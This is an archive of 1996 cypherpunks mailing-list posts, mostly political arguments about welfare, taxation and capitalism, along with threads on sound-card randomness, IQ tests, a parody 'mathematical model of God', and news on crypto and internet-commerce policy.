From: Jim Wise <jw250@columbia.edu>
Date: Wed, 27 Nov 1996 11:17:59 -0800 (PST)
To: Clay Olbon II <olbon@ix.netcom.com>
Subject: Re: wealth and property rights
In-Reply-To: <1.5.4.32.19961127131858.006ebe30@popd.ix.netcom.com>
Message-ID: <Pine.SUN.3.95L.961127135907.23624C-100000@aloha.cc.columbia.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Nov 1996, Clay Olbon II wrote:

> This is provably bullshit.  Look at the HUGE numbers of people in this
> country who make the economic decision to do nothing and go on welfare vs.
> going to work.  Examine carefully the economic performance of the US vs the

Actually, at the risk of interrupting your little diatribe, the average
welfare recipient is on the dole for under 4 months.  While we're on the
subject, I may as well point out that the average welfare recipiant is also
white, lives in a lower-middle class suburban neighborhood, and has two or
fewer children, but you'd never know it from watching the pols...

At any rate, as I mentioned in my last post, you and I are paying three times
as much to corporate welfare as to personal welfare...

[Source: Michael Moore _Downsize_This_, NY Crown Books, 1996]

> See my above points.  Implement this and prepare the for US to become a
> third world country.  100% inheritance taxes would probably be the largest
> incentive for people to leave (they leave now with ONLY a 50% inheritance

Actually, the US has one of the lowest tax rates in the world, and far
less of your tax money goes to welfare (or foreign aid, or disaster relief,
etc.) than in any other industrialized nation...

[ibid]

> tax).  And who would get the money?  Those who are producing nothing, giving

Yes, your taxes do go to those who are producing nothing, namely a bunch of
CEOs and wealthy shareholders

> them even greater incentives for producing nothing (heck, get welfare
> payments up around $50K and I would quit work - I could find lots of
> enjoyable and intellectually stimulating ways to keep myself busy!).

Or welfare payments of up to $500 million at a shot, if you happen to be GE, or
General Motors...

> Bullshit.  See above.

You keep using that word...  I do not think it means what you think it means...

> You are extremely idealistic.  Try coming back to reality.  Examine the
> "test cases" for the policies you advocate (and there are plenty of examples
> of socialist policies both in this country and others) - and realistically

The only examples of large-scale socialism we have are in extremely statist
environemnts.  Statism is brutal and innefficient no matter what economic
system it pays lip service to.

--
				Jim Wise
				System Administrator
				GSAPP, Columbia University
				jim@santafe.arch.columbia.edu
				http://www.arch.columbia.edu/~jim
				* Finger for PGP public key *





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip M. Hallam-Baker" <hallam@ai.mit.edu>
Date: Wed, 27 Nov 1996 11:44:35 -0800 (PST)
To: "Cypherpunks (E-mail)" <cypherpunks@toad.com>
Subject: IQ and age
Message-ID: <01BBDC71.A2A247E0@crecy.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain




>Contrary to popular armchair psychology, there is no significant evidence 
>that IQ and age are inversely related.  In general, however, the older we 
>get, the less we use our brain, and it becomes like a muscle that we no 
>longer use.

Contrary to popular belief there is no sound evidence for believing many
of the claims made for IQ tests. IQ measures ones ability to do IQ 
tests and little else. 

They were originally invented as a means of measuring the response of 
mentally defective patients so that their progress under different
treatment regimes could be compared. 

There is no evidence to support the many claims made that IQ measures
"innate" intelligence. If you practice IQ tests your score will increase.
When I was 10 I used to spend each Friday afternoon practicing IQ tests 
for the entry examination to the upper school. My "IQ" increased by
30 points over that time, an most of the people in the class managed
to improve their score by at least 10.

>The point: Yes, you can improve your brain, and you can take proactive 
>steps to increase your IQ.

Absolutely, it may not be the best idea if you want to be able to fit
in socially however. You will then have to leave in a world where 
everyone you meet has a lower IQ.


	Phill










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 27 Nov 1996 11:23:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Sound card as a random number source ??
In-Reply-To: <199611271529.QAA00236@zenith.dator3.anet.cz>
Message-ID: <Pine.LNX.3.95.961127142046.562A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 27 Nov 1996, Pavel Korensky wrote:

> when I read about hardware random number generators in this mailing list, I got
> one idea. Maybe it sounds crazy, but is it possible to use soundcard
> (SoundBlaster for example) as a source for really random numbers ?
> What if I connect the input line of the soundcard with some external source of
> noise, like FM receiver or Dolby Surround decoder (with built-in white noise
> generator) or tape recorder with blank (erased) tape. It is possible to sample
> the sound (noise) and use the sampled values as a random numbers ? And how much
> random is this source ? 

The LSBs of a recording of white noise or static should be pretty random.
This should not be your only source of entropy as it's very easy for an
attacker to bias the signals.  If a one-way hash is applied to the output, it
does make it much more difficult for an attacker to predict or influence the
RNG.

Mark
- - -- 
finger -l for PGP key
PGP encrypted mail prefered.
0xf9b22ba5 now revoked

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMpyV2SzIPc7jvyFpAQF8+ggAvRmoEaJqaK80j1RxKAp7Y44gjKxWlVPd
pZlD+9P8bwoKQWZsMtKwG790d34ebmqnDVm6ES9mcp2HI1lqHrjDub6+dBPZyRjo
+NPhdtRmLZ4iqzE9n0xAPTeMDJGQOmxKQHHJCzOmG5nio5OFPyJzAbZy9DkNiH8A
n6xp+YBtC3gL7NKufMo0ehVW4XMM4EkwKmpIRMHM+m9Q8lhsQxzPr2+GaDQwo18s
jkrEB4xK+wnscpsjz/c7hvNnutgdVjlCU7xhDuR+prb4dHwAqhraXDgrpZuhZC8M
+Wyau1/11VXAfY03e8i/CiFrE4d6h9li95EopBuO6EfcjWZGgMH80g==
=FSod
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Wed, 27 Nov 1996 11:39:25 -0800 (PST)
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: Your login/password for SafePassage beta
In-Reply-To: <199611271407.OAA14579@www.ukweb.com>
Message-ID: <Pine.SCO.3.93.961127142519.798G-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Nov 1996, SafePassage Downloader wrote:

> You can now download SafePassage. You'll need the following login/password:
> 
> Login: cypherpunks@toad.com
> Password: 2xLBsxut
> 
> Go to http://stronghold.ukweb.com/safepassage/ and select "Download" -- 
> you'll be prompted for your login/password, after which you'll be able to
> download the software.   Make sure you keep your login/password
> private.   Revealing your login/password to anyone is a violation of the
> license agreement.

Is this to say that you wrote your license agreement with the foolish
premise that an e-mail address belongs to just one person?  Maybe you need
to really understand how the Internet works before you write a license
agreement based on incorrect assumptions and your personal preferences for
how things ought to be. 

------------------------------------------------------------------------- 
|It's a small world and it smells bad     |        Mark Aldrich         |
|I'd buy another if I had                 |   GRCI INFOSEC Engineering  |
|Back                                     |     maldrich@grci.com       |
|What I paid                              | MAldrich@dockmaster.ncsc.mil|
|For another mother****er in a motorcade  |Quote from "Sisters of Mercy"|
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip M. Hallam-Baker" <hallam@ai.mit.edu>
Date: Wed, 27 Nov 1996 11:44:41 -0800 (PST)
To: "Cypherpunks (E-mail)" <cypherpunks@toad.com>
Subject: Re: Star Trek: First Contact
Message-ID: <01BBDC71.A4889410@crecy.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>> Are any of the characters in the new Star Trek gay?

>The bold guy who plays Captain Picard is very gay in real life.
>(He probably hated all those love episodes with women :-)

Actually the opposite is the case, he is a notorious womanizer. He played
a gay man in the recent remake of La Cage aux Folles and made the point
that he has also played Stjannus in "I Claudius" and nobody asked if he
was a homicidal maniac.

Yet more proof that nothing Dimitri says is relevant or interesting.

	Phill







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sven <sven@loop.com>
Date: Wed, 27 Nov 1996 15:06:46 -0800 (PST)
To: rshvern@gmu.edu
Subject: God described
Message-ID: <2.2.32.19961127223906.00a55e78@pop.loop.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>                        MATHEMATICAL MODEL OF GOD AND JESUS
>
>Sexual Sin and Christians
>
>   19940404
>
>   Charles Magee (Not available via Internet),
>   See also:
>     * Classification of Religions
>     * Life After Death
>
>This article's surreality index is 'U' (unreal).
>
>To solve the question of if sex is a sin in Christianity, the following
>model has been constructed.  In this model God is a point mass, centered
>at the origin of our XYZ space.  Christ, we assume, is at the right hand
>of God, about 100 centimeters away.  His mass is probably around 75
>kilograms.
>
>Since God has a very large mass (a bit less than infinity), Christ, who
>we assume is in a circular orbit around God, has a very large momentum,
>and hence has a very small wavelength.  This means that Christ's
>uncertainty is quite small, so we can therefore conclude that he is
>fairly certain in all that he does.
>
>Now let us consider a sinner.  We shall place him at a large distance from
>God, say one inch and 45 million light-years.  He, being at a constant
>distance from God and thus in a circular orbit, and having approximately
>the same mass as Christ, will be travelling significantly slower than
>Christ, and will therefore be more uncertain.  One should also consider,
>however, that since Christ's orbit could fit in a kiddie pool, while the
>sinner's would encompass not only our galaxy, but a few of the nearby ones
>as well, that the sinner gets around more, sees more, and is generally a
>more knowledgeable guy than the Savior.  This fits in with traditional
>wisdom.
>
>Mary, the Mother of Jesus, being a fairly pure person, is close to God.
>This means that she must be a fast woman.  From this situation we can draw
>the conclusion that sinners have a lot more potential than saints, since
>less of their energy is stored as kinetic energy.  Further insights can be
>gained when we look at the situation of the heathen.
>
>A heathen is someone who, in general, is not affected by God.  This means
>that they are at least an infinite distance from him.  Now, assuming that
>one of these folk starts, by random causes, to travel towards God, he will
>convert his potential energy to kinetic energy during the approach, or
>descent.  Since he started out an infinite distance away, but with some
>kinetic energy of his own, he will approach God on a hyperbolic trajectory
>and then disappear into space again, never to be seen again.  If his
>approach is such that it brings him inside the orbit of The Son of God,
>then right after his closest approach, the heathen's velocity will be
>greater than Jesus', which means that he will be more sure of himself in
>his escape than Christ who is in orbit.  This is an interesting notion,
>but some of the side ramifications are even more intriguing.
>
>Without any orbiters, therefore, God would not be able to attract anyone;
>all approaching bodies would have either parabolic or hyperbolic
>trajectories.  However, once God has an orbiter, the two of them could
>collaborate to capture other bodies.  This means that heathens that get
>too close to believers in their approaches might get trapped, and by the
>same token, believers who are buzzed by heathens could be ejected.
>
>And what, the reader asks at this point, does any of this have to do with
>sex?  Well, the answer is this:  Sex, as we all know, is the union of two
>or more people.  This, in our analogy, would be represented as a collision.
>Now, in Christianity, almost all of the holy figures are male.  For God, a
>collision between any of these close in folk would be disastrous, because,
>even if we assume they are indestructible, such a high energy collision
>would either:
>
>          A) Eject one of the men out of orbit (becoming a heathen)
>          B) Cause one of them to fall into God (to die)
>          C) Give them highly irregular elliptical orbits (becoming a
>             doubter)
>
>All of these would be bad for God, because in the first two he would lose
>orbiters, making His chance at capturing new ones less, and in the third
>case He would have a much greater chance of more collisions, as the
>elliptical orbiters would cross many of the unaffected circular orbits.
>Therefore, God probably disapproves of these collisions.

|__
   |--> SVEN: a.k.a. Chris Blanc
        Internet consulting/Web design
		
		[ http://www.loop.com/~sven/ ]

Some only sample the dark wine of life's blood...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Kinchlea <security@kinch.ark.com>
Date: Wed, 27 Nov 1996 15:59:17 -0800 (PST)
To: snow <snow@smoke.suba.com>
Subject: Re: wealth and property rights
In-Reply-To: <199611272302.RAA01129@smoke.suba.com>
Message-ID: <Pine.LNX.3.95.961127145412.550E-100000@kinch.ark.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Nov 1996, snow wrote:
You are clearly an angry young man. I am sorry you have such a poor
opinion of people, I am even more sorry if it is justified. You can
believe me or not, but what you describe is *not* the ordinary case in
this country. Of course, in this country we have a disgusting 10+%
unemployment rate. Even if people DO want to work, there are no jobs.

All that aside, I can tell you do not have a family if you thing that
$6.50/hr is a living! Even accounting for the difference in our dollar,
I would say that is barely subsistence income for a single person. Are
we *all* not worthy of more than that?

cheers, kinch


Key fingerprint =  CE 54 C3 93 48 C0 74 A0  D5 CA F8 3E F9 A3 0B B7 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clay Olbon II <olbon@ix.netcom.com>
Date: Wed, 27 Nov 1996 12:12:22 -0800 (PST)
To: Dave Kinchlea <security@kinch.ark.com>
Subject: Re: wealth and property rights
Message-ID: <1.5.4.32.19961127200939.006d71c0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:54 AM 11/27/96 -0800, Dave Kinchlea wrote:
>On Wed, 27 Nov 1996, Clay Olbon II wrote:
>> 
>> This is provably bullshit.  Look at the HUGE numbers of people in this
>> country who make the economic decision to do nothing and go on welfare vs.
>> going to work.  Examine carefully the economic performance of the US vs the
>
>I don't know how much people get on welfare in your country but I
>suspect that it is even less than in this country (Canada). Anyone who
>truly believes that people make the `economic decision to do nothing and
>go on welfare vs. going to work' has, in my opinion, no &^%* idea what
>they are talking about. Just try to *live* on a welfare wage for a few
>months to see how silly this thought is. While there may well be a few
>`welfare-moms' (which is not necessarily a bad thing, taking care of
>children is an investment for society), the vast majority of people on
>welfare (at least here)  would *much* rather get a decent job and work
>for their money. There are, perhaps, a few people who would rather not
>work for minimum wage (who find it impossible to feed their family on
>that) but I suspect that those folks are few and far between. 

The average welfare benefit (including food stamps, medicaid, and all the
other myriad programs) is $10/hr.  Compare to a minimum wage of $5/hr.
Offer most welfare recipients a minimum wage job and they will laugh in your
face.  (In fact, here in Michigan most employers are already paying several
$$ above minimum wage, and often these jobs are unfilled).

>> More bullshit.  You don't know what anyones motives are.  To ascribe your
>> motivations to Bill Gates is unrealistic.  
>
>But you claim to know the motives of those on welfare: pot->kettle->black

I don't claim to know the motives.  I am examining empirical evidence.  As
the welfare benefit increases, more go on welfare, as it decreases, less go
on welfare.  Someone is making economic decisions, consciously or
unconsciously.  

        Clay


*******************************************************
Clay Olbon			    olbon@ix.netcom.com
engineer, programmer, statistitian, etc.
**********************************************tanstaafl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Murphy <packrat@iinet.net.au>
Date: Tue, 26 Nov 1996 23:09:37 -0800 (PST)
To: rudd_a@alph.swosu.edu (Amy Rudd)
Subject: Re: public
In-Reply-To: <v01540b01aebf5a364b89@[164.58.41.89]>
Message-ID: <199611270715.PAA00828@ratbox.rattus.uwa.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "A" == Amy Rudd <rudd_a@alph.swosu.edu> writes:


A>I am new here, and I was wondering, why are there still stupid, immature
A>people on line who have the audacity, here in the 90's, to still call
A>people a "cocksucking faggot".  I mean no offense here, but please, stop
A>using such offensive words!  Thanks....   As I said, I am new here, and am

<grin> You are probably going to want to see if the mail program you
use will allow you to sort all the mail from this list into a separate
folder. There is so much of it that you will probably start to lose
track of your personal mail.

Apart from that, there are a number of people on the list who very
very rarely ever contribute anything worth reading. There are two
approaches to this: you can learn to recognise the posts and ignore
them, as I do, or again if you mail software allows it, you can get it
to automatially discard posts from these people.

A>a libertarian/anarchist who wants the government to butt out of our
A>lives...I am very interested in privacy, and am also against censorship.  I
A>hope there are others out there who feel as I do, but if not, I guess I'll
A>find out I'm on the wrong place!!   :-)   Anyhow, I hope you can welcome a
A>Cincinnati goth who lives in Oklahoma...thanks!!....Amy

If you can stand the list, you might well get into some interesting
discussions. Give it a try for while though.

A>****************************************************************************
A>*****
A>*
A>*     It's better to regret something you did than something you
A>*                                                          *
A>didn't do.                                             *
A>*                                                                           *
A>*                                                                           *
A>****************************************************************************

Any chance of you cutting the size of your signature down a bit?

B.
--
Packrat (BSc/BE;COSO;Wombat II Designer)
Nihil illegitemi carborvndvm.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Zerucha <root@deimos.ceddec.com>
Date: Wed, 27 Nov 1996 12:21:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: wealth and property rights
In-Reply-To: <329BA29F.B97@earthlink.net>
Message-ID: <Pine.LNX.3.95.961127145308.1948B-100000@deimos.ceddec.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 26 Nov 1996, Stephen Boursy wrote:

>   Well the original issue we were discussing was the fact that
> a majority of wealth in the US in not earned--it is inherited.  That
> can be changed very quickly with proper legislation.

It may also be an advantage.  Anyone looking today at what passing wealth
onto the offspring does to them would make them more likely to give it to
someone else.  (I don't agree with Ayn Rand on everything, but Atlas
Shrugged has a short treatise on money, and one point she makes is that
inherited wealth is always squandered unless those who inherit it are as
good at handling it as the parent - I can also add, unless they go into
politics and rig the game).

>   As to your other issue here--earnings and limitations on accumulation,
> much would be equalized without inheritance.  But yes--there would
> still be accumulators--most would still produce regardless of
> limits because as I said their motives are not simply income--power,
> prestige, etc. all come in to play as well as the gratification that
> comes with winning.  Gates enjoys his cover on Time Mag. much more
> than a few extra million a day.

I believe in strong laws to prevent the accumulation of power.  Lord
Acton (Power tends to corrupt) was a Classical Liberal.  Wealth is one
form of power, but it is self regulating in that you can only do so
much damage until you go bankrupt.  When you own the guns, there is
much less limitation.  Gates can buy Time and put his face on every
week, but I don't think people would keep buying Time if Gates was the
only feature.  Time also puts Gates on because he is newsworthy.

>   But the basic answer to your argument--from my standpoint--is that
> some people are extremely intellegent, others very gifted in other
> ways, others very dull witted, etc.  Some possess artistic genius
> that can pay off immediately, others have none that is valued dollar
> wise by society.  I sincerly don't believe one has the right to
> live better than the other--that the rewards, if different, sould
> be negligable.  

The problem IS one of value.  When you say someone has a valuable
talent, that is not valued "dollar-wise", what value does it have?  If
you are setting yourself up as god you can give an answer, but
otherwise I don't think any of us have enough information.  Price
defines how valuable something ACUTALLY IS to society, not how much it
would be valued in Utopia, or in a particular person's utopia.

I like music of the period from Bach through Beethoven.  I, as god,
would discourage Sibelius and DeBussey from being played.  You
probably have different tastes, and as god, would favor different
music.  I express myself by buying recordings of Bach, Schubert, etc.
You buy others.  That is how the value is shown, and how rewards are
equitably distributed.  People like me paying for a CD of the goldberg
variations send information in the form of price to those considering
producing the recording.

Rock Stars and Atheletes are far more overvalued (and tend to be
corrupted by it) in a moral-philosophical sense, so should we close
down all the stadia, and only produce classical CDs - this would be
the first step toward your idea of a "just" society.

I think there are a lot of stupid people out there who would be happy
on half the income doing something they like.  But if someone values
money more than frustration, it is their choice, and I don't have the
right to violate it.  I like music, but am terrible at making it, so I
program, which I also like instead, and I don't do ironwork which
might pay well, but I don't enjoy.

I am left to the terrible justice of my own choices.

>   If I could make as much as I do know programming by working as
> a clerk in a convenience store or whatever I would still choose to
> do what I am doing.  If you are in a different situation you're
> in the wrong career.

Then I would suggest you live by your own words and become a store
clerk and work on free software.  You have no right to be happily
employed doing something you enjoy while there are miserable clerks
out there.  You should free an existing clerk to pursue his dream for
a while.  Or is it "A free market for me, but not for thee"?

I have a very good job BECAUSE it is what I like doing.  I could
easily double my income by changing my condition and battling uphill
as an independent contractor.  But I make a choice between money and
contentment.  We all do.  And I cannot set up a better system.

tz@execpc.com
finger tz@execpc.com for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Wed, 27 Nov 1996 15:30:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Turning Peas Into Stars
Message-ID: <199611272330.PAA10125@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In sci.math, David Madore <madore@clipper.ens.fr> writes:

 > Fanciful but true statement: it is possible to cut a pea in a
 > finite number of pieces, and rearrange them so as to make a ball
 > the size of the sun (leaving no holes, of course).

Nothing to do with crypto, of course, but at least it has something
to do with math. 

Does anyone remember Martin Gardner's April Fool's Day "Mathematical
Games" column in Sci Am in which he proposed the Banach-Tarski Paradox
as a practical method of turning a solid gold sphere into two solid
gold spheres each identical to the original?

A nice illustration of why all sets can't be measurable. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clay Olbon II <olbon@ix.netcom.com>
Date: Wed, 27 Nov 1996 12:36:26 -0800 (PST)
To: Jim Wise <jw250@columbia.edu>
Subject: Re: wealth and property rights
Message-ID: <1.5.4.32.19961127203425.006dff10@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:17 PM 11/27/96 -0500, Jim Wise wrote:
>Actually, at the risk of interrupting your little diatribe, the average
>welfare recipient is on the dole for under 4 months.  While we're on the
>subject, I may as well point out that the average welfare recipiant is also
>white, lives in a lower-middle class suburban neighborhood, and has two or
>fewer children, but you'd never know it from watching the pols...

Just because lots of white folks get it for a short time it must be OK then
;-) Welfare (and the so-called safety net) hurt far more people than it
helps.  The poverty rate in this country is unchanged after 30 years of
transfer payments totalling over a trillion dollars.  The worst living
conditions in the country are in areas of subsidized housing.  It ought to
start clicking with someone soon that the only people the current system
really helps are in Washington DC. I don't have a solution, but I can face
the reality that what we currently have doesn't work.  By extension, I
believe that most changes offered (more $$, minor tweaks to the system),
will offer similarly poor results.

>
>At any rate, as I mentioned in my last post, you and I are paying three times
>as much to corporate welfare as to personal welfare...
>
>[Source: Michael Moore _Downsize_This_, NY Crown Books, 1996]
 
Micheal Moore is far down on my list of reputable authors.  His point is
blatantly untrue, as it equates direct transfer payments (welfare) to tax
breaks (in the same light, your mortgage and dependant deductions should
count as transfer payments to individuals).  Not that I am for corporate
welfare.  Personally, I am for elimination of corporate income tax entirely
- who do you think really pays it?  Hint - it is you and me in higher prices
for goods and lower return on investments.  As such, it is the worst kind of
tax, an invisible one.

>> See my above points.  Implement this and prepare the for US to become a
>> third world country.  100% inheritance taxes would probably be the largest
>> incentive for people to leave (they leave now with ONLY a 50% inheritance
>
>Actually, the US has one of the lowest tax rates in the world, and far
>less of your tax money goes to welfare (or foreign aid, or disaster relief,
>etc.) than in any other industrialized nation...

BINGO!  You win the prize.  We also have lower unemployment, higher GDP
growth and more economic stability than any of the other large
industrialized counties. You think there might be a correlation there? 

>Yes, your taxes do go to those who are producing nothing, namely a bunch of
>CEOs and wealthy shareholders

This is just silly.  If you run a business you are employing lots of folks,
and you are delivering a product or service.  This is producing.  If you are
a shareholder, you are risking your capital to support a business, hoping
that business will grow, producing more jobs, etc.  Besides, because of the
growth of 401K plans, the majority of Americans now fall into the
shareholder category. 

>> them even greater incentives for producing nothing (heck, get welfare
>> payments up around $50K and I would quit work - I could find lots of
>> enjoyable and intellectually stimulating ways to keep myself busy!).
>
>Or welfare payments of up to $500 million at a shot, if you happen to be GE, or
>General Motors...

As I said, I don't agree with corporate welfare.  Of course, GM produces far
more jobs than the average welfare recipient.


>The only examples of large-scale socialism we have are in extremely statist
>environemnts.  Statism is brutal and innefficient no matter what economic
>system it pays lip service to.

Agreed.  But how do you redistribute wealth without a statist society?  The
only reason I pay taxes is because I will go to jail if I don't.

        Clay


*******************************************************
Clay Olbon			    olbon@ix.netcom.com
engineer, programmer, statistitian, etc.
**********************************************tanstaafl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Wise <jw250@columbia.edu>
Date: Wed, 27 Nov 1996 12:47:06 -0800 (PST)
To: "William H. Geiger III" <whgiii@amaranth.com>
Subject: RE: Re: wealth and property rights
In-Reply-To: <199611271638.KAA30991@mailhub.amaranth.com>
Message-ID: <Pine.SUN.3.95L.961127153457.18734A-100000@merhaba.cc.columbia.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Nov 1996, William H. Geiger III wrote:

[...snip...]

> socialism uses FORCE to take what it wants while the capitilism you have a
> free & volintary exchange.

No.  Some systems are based on coercion, some are based on freedom.  This is a
completely different issue from whether a system is based on sharing or
hoarding...  As several people have been trying to explain to you, there are
really _two_ axes at work here.  (Something, for all my differences with its
authors, the `Libertarian Test' shows quite well)  One the one hand, some ssytems
are statist while others are anarchistic/librtarian.  On the other hand, some
systems are based on individual ownership, while others are based on communal
cooperation.  These axes are completely independent.

In a statist system, it doesn't matter whether you call yourself a `socialism' or
a `capitalism' -- the state can only preserve itself through theft and brutality.

On the other hand, in a free system, you would have the option of pursuing
capitalism, hoarding goods to trade with those of similar beliefs, while those who,
as myself, believe that more can be accomplished by pooling efforts and resources
would be free to work toward such a community.  Surely you do not find socialism
so frightening that you would deny us the right to seek it _for_ourselves_...

> why is this so hard to understand??

Because it is a gross oversimplification based on a misunderstanding of the basic
issues at stake...

--
				Jim Wise
				System Administrator
				GSAPP, Columbia University
				jim@santafe.arch.columbia.edu
				http://www.arch.columbia.edu/~jim
				* Finger for PGP public key *





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Zerucha <root@deimos.ceddec.com>
Date: Wed, 27 Nov 1996 12:49:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: wealth and property rights
In-Reply-To: <Pine.NEB.3.94.961127071424.513A-100000@localhost>
Message-ID: <Pine.LNX.3.95.961127142948.1948A-100000@deimos.ceddec.com>
MIME-Version: 1.0
Content-Type: text/plain


We DON'T live in a "capitalist" (free market, if you prefer) society.  If
we didn't have socalism transferring wealth, I would not need to pay
taxes, nor worry about having government take my wealth at gunpoint. 

Saying that Argentina is "capitalist" is the mistake, not that it is an
example where it does not work.  I would like an example where socialism
does work - by "work" I mean that resources are used efficiently.  Hong
Kong and Singapore exist.  The latter is far from free, politically, but
the economic freedom leads to efficient use of resources.  The closest
thing to a "working" socialist society I can think of is a monastary (many
do become wealthy), but I don't think the majority of the population can
emulate it.  The Amish may be socialist, but are they economically
efficient?  Any real capitalist society will be inferior to an imaginary
socialist utopia, just as cars are far more efficient where inertia and
aerodynamics don't exist.

Also, to define terms (for the purposes here, and to correct confusion
from earlier posts):

Socialism is where the government controls the means of production (this
includes regulation, so that I may "own" a factory, but the government
tells me what to produce, and/or how much and/or at what price). 

Capitalism (or pick another word) is where private individuals
(potentially acting collectively in a corporation) control the means of
production, and make the decisions of what and how much to produce, and
what price to sell it at.  Capital is a factor in production.

By Capitalism, I don't mean corpratism.  Corporations find it in their
interest to pass protectionist laws and corporate welfare benefits and
thus destroy free enterprise.  If you can keep small businesses to a
minimum, they will have less chance of becoming competitors.  But
corpratism requires government to set the product, quantity, or price,
which is under my definition of socialism.

I also don't mean anarchy, in the sense that I have to protect myself
individually from violence, theft, and fraud.  That is one of the few
proper functions of government.  Trade doesn't flourish when each
monitary transaction is trumped by weapons.

My point is that the Capitalist (free enterprise) society will be
wealthier and happier than a socialist society, not that it will be
perfect.

Corporations will benefit from many things, even in a free enterprise
society - and I hope they do, since (with the current bias against
independent contractors - another socialist idea) I stand a better chance
of being employed and making money the more healthy corporations compete
for my labor.

tz@execpc.com
finger tz@execpc.com for PGP key









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 27 Nov 1996 12:57:10 -0800 (PST)
To: pavelk@dator3.anet.cz
Subject: Re: Sound card as a random number source ??
In-Reply-To: <199611271529.QAA00236@zenith.dator3.anet.cz>
Message-ID: <199611272052.PAA17382@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Have you tried it without a mike plugged in?
Always think about failure modes.

Adam


Pavel Korensky wrote:
| Hello,
| 
| when I read about hardware random number generators in this mailing list, I got
| one idea. Maybe it sounds crazy, but is it possible to use soundcard
| (SoundBlaster for example) as a source for really random numbers ?
| What if I connect the input line of the soundcard with some external source of
| noise, like FM receiver or Dolby Surround decoder (with built-in white noise
| generator) or tape recorder with blank (erased) tape. It is possible to sample
| the sound (noise) and use the sampled values as a random numbers ? And how much
| random is this source ? 
| I tried to find some mentions about this method with altavista, but I didn't
| found anything.
| 
| Bye PavelK
| 
| 
| --
| ****************************************************************************
| *                    Pavel Korensky (pavelk@dator3.anet.cz)                *
| *     DATOR3 Ltd., Modranska 1895/17, 143 00 Prague 4, Czech Republic      *
| *  PGP key fingerprint: 00 65 5A B3 70 20 F1 54  D3 B3 E4 3E F8 A3 5E 7C   *
| ****************************************************************************
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Wed, 27 Nov 1996 15:55:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: TV/Radio: Crypto Policy on NPR
Message-ID: <199611272353.PAA04644@ohio.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


McNeil & Lehear (sp?)  (ok, I know, one of them is gone, but I forgot
which) News Hour had a segment on crypto policy.  Generally a balanced
non-technical report, except that there is no mention of the free
speech issue.

If there is a repeat near you, it's worth listening to, to hear (or
see) what the informed non-technical public hears (sees).

Ern




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Wed, 27 Nov 1996 16:03:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: New white house internet commerce report
Message-ID: <v03100a00aec2842b0214@[207.67.246.99]>
MIME-Version: 1.0
Content-Type: text/plain


the full report can be found at:
	<http://www5.zdnet.com/zdnn/content/inwo/1127/inwo0001.html>

Whitehouse Releases Blueprint For Major Net Issues Concerning Government 
And Commerce 
By Will Rodger 
November 27, 1996 02:35:13 PM EST
Inter@ctive Week Online 

The White House will release a blueprint for the governance of personal 
and business transactions over the Internet early next week that 
drafters and industry alike say marks a turning point in the Clinton 
administration's approach to cyberspace.

The document, a product of an 18-agency working group headed by 
presidential Senior Adviser Ira Magaziner, covers every cyberspace major 
issue before governments and Internet users worldwide. Though in many 
ways it is a restatement of approaches already suggested elsewhere, the 
document urges a shift towards free market forces on the Net and a 
rejection of government interference in electronic commerce.

The blueprint also represents the first time the administration has 
issued unambiguous policy statements regarding tariffs, censorship on 
the Internet and establishment of a body of international law for 
commerce.
